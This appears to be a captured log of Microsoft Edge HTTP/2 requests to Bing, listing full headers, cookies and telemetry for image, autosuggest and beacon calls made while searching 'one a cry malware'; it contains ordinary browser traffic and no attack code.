useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-BFdL2yPMfoP0RLjKKDflnowWVnFzBhMhWgxPuPn80Ds='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:10 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a774
GET

https://www.bing.com/th?id=OSK.I0pK4NmtAdl_p81J2cNpFqskTFEfywIZQTyISD70H8g&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.I0pK4NmtAdl_p81J2cNpFqskTFEfywIZQTyISD70H8g&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1988
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcbc3784543bdbd1920f9cd624b
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-cpjegQzKuk91knTU/wNNvD7JTN2eqqj0QljczEUQEcg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:11 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491aede
GET

https://www.bing.com/th?id=OSK.21e0f6addf5a8bbab57259113bb3f819&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.21e0f6addf5a8bbab57259113bb3f819&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3040
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afa4
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4463
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afa5
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=w&cp=1&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=w&cp=1&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3788
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afa6
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%22%2C%22AsResponseLength%22%3A%221369%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049541%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%2Cig%3AE8CC9799766B4558A712534938473B66%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049541%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049570%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%22%2C%22AsResponseLength%22%3A%22877%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049661%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%2Cig%3A0B1C11D4C3944385AD9866F8DCE1B2EE%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049661%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A18%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199050439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199050460%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22AsResponseLength%22%3A%221988%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199050536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%2Cig%3ACD5043C961D9403DAF8CB01A2071EE5B%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199050536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199050539%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%22%2C%22AsResponseLength%22%3A%221369%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049541%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%2Cig%3AE8CC9799766B4558A712534938473B66%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049541%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049570%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%22%2C%22AsResponseLength%22%3A%22877%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049661%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A16%2Cig%3A0B1C11D4C3944385AD9866F8DCE1B2EE%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049661%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A18%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199050439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199050460%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22AsResponseLength%22%3A%221988%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199050536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%2Cig%3ACD5043C961D9403DAF8CB01A2071EE5B%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199050536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aw%2Ci%3A17%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199050539%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4022
